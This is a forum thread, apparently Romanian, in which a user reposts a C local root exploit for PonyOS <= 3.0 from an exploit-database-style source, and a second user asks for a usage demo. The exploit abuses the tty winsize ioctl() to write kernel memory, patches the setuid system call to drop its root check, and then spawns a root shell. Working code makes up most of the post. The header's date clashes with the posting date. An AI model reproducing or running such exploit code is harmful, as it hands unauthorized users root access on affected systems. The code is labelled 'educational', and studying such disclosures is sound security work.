Aerosol Posted June 3, 2015 Report Posted June 3, 2015 (edited) # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit# Google Dork: [if applicable]# Date: 29th June 2015# Exploit Author: HackerFantastic# Vendor Homepage: www.ponyos.org# Software Link: [download link if available]# Version: [app version] PonyOS <= 3.0# Tested on: PonyOS 3.0# CVE : N/A# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c/* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka*/#include <stdio.h>#include <stdlib.h>#include <sys/ioctl.h>int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh");}Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul. Edited June 4, 2015 by Aerosol
Byte-ul Posted June 3, 2015 Report Posted June 3, 2015 (edited) Poti face un demo care arata cum se foloseste aceasta vulnerabilitate? Thanks.Up. Probabil erai ocupat cu crearea de articole interesante si nu ai vazut postul meu. Edited June 4, 2015 by Ganav Post dublu
